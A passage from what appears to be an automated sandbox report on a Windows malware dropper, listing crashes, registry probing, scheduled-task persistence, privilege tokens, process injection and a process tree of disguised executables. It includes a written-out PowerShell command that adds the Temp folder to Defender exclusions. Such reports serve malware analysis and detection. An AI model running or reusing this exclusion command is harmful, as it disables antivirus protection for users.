N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 5036 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe
PID 5036 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe
PID 276 wrote to memory of 4764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe
PID 276 wrote to memory of 4764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07ef9e317e0f6ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07b3bf87d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07caa83bac5d15.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07e35cf558.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07267c17f2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue070aab9bc86b572.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue071e59dc8292b4ef1.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe

Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe

Tue07b3bf87d8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

Tue07caa83bac5d15.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe

Tue07e35cf558.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe

Tue07ef9e317e0f6ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe

Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07816149b72db00.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe

Tue070aab9bc86b572.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe

Tue07267c17f2f5.exe

C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp" /SL5="$E01DA,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe

Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe

